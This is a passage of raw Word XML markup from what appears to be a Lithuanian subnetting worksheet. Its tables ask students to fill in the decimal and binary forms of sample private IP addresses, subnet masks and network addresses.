              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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1766579" w14:textId="70A46172" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dešimtainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="185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61F9A5E" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="77FE329E" w14:textId="77777777" w:rsidTr="00915591">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="104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7D013F1" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">IP Address </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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16D7DB" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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499E9B5" w14:textId="17C93584" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.145.29 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="185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FA780A0" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591"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75D226E8" w14:textId="77777777" w:rsidTr="00915591">
        <w:trPr>
          <w:trHeight w:val="382"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="104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DE8D5F3" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Subnet Mask </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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891939" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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864C38A" w14:textId="1063AA4E" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">255.255.0.0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="185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CAE4D23" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591"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6DFAF3AE" w14:textId="77777777" w:rsidTr="00915591">
        <w:trPr>
          <w:trHeight w:val="384"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="104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A2B8167" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Address </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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684F8F" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="104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2100E48" w14:textId="589983F6" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="185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D00AD09" w14:textId="77777777" w:rsidR="00915591" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F634A01" w14:textId="59DC65C7" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užpildykite trūkstam</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lentelių </w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>skiltis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="79" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3079876E" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="531"/>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2F1AE281" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Aprašyma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3570360C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dešimtainis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2CD63344" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1D317B5E" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="390"/>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14D44A1"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IP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C4E9AC5"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192.168.10.10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E945FF0"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12A26623" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="382"/>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E567E52"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Subnet Mask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738D9F8"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255.255.255.0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B0ED230"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6EEE886D" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="384"/>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B35195D"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Network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F1AFE05"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98FDBC3"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bl>
    <w:p w14:paraId="4FF4AD77" w14:textId="6770D941" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užpildykite trūkstam</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lentelių </w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>skiltis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="81" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="15F5A7D4" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="532"/>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78AF8F69" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Aprašyma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21D9F8B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dešimtainis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57E364B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="06D8459A" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="388"/>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C342C90"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IP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89E3ACC"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192.168.68.210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9427D92"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5BE004A3" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="384"/>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1F2C64A"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Subnet Mask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9ADD834"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255.255.255.128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D4C1C22"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70D3CADF" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="382"/>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C1EDB93"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Network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6DA61A2"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2E0456B"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bl>
    <w:p w14:paraId="081AC547" w14:textId="3EEA5117" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užpildykite trūkstam</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lentelių </w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>skiltis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="81" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2711FABD" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="531"/>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60EED5E" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Aprašyma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5B4E7F3" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dešimtainis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832FC9E" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="12863495" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="390"/>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7CCE71E"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IP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ACB6E86"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172.16.188.15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95BD1A3"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45FC53B6" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="382"/>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19BEDDA"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Subnet Mask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600A71B"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255.255.240.0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217614B"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45C599D0" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="384"/>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C24424F"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Network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610BEB2"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B707F05"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bl>
    <w:p w14:paraId="48AAA6D7" w14:textId="2B3207BA" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užpildykite trūkstam</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lentelių </w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>skiltis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="81" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2630"/>
        <w:gridCol w:w="2631"/>
        <w:gridCol w:w="4654"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0C67750B" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="531"/>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5CF5D9F" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Aprašyma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F477C99" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dešimtainis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483B945" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Dvejetainis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="06ABA997" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="388"/>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801ECD3"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IP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CE765F1"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10.172.2.8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43EC22A"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r w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="070A1FC6" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:trHeight w:val="384"/>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295C1A7"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Subnet Mask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632D532"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255.224.0.0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729BB7B"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r w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="0A97DD21" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
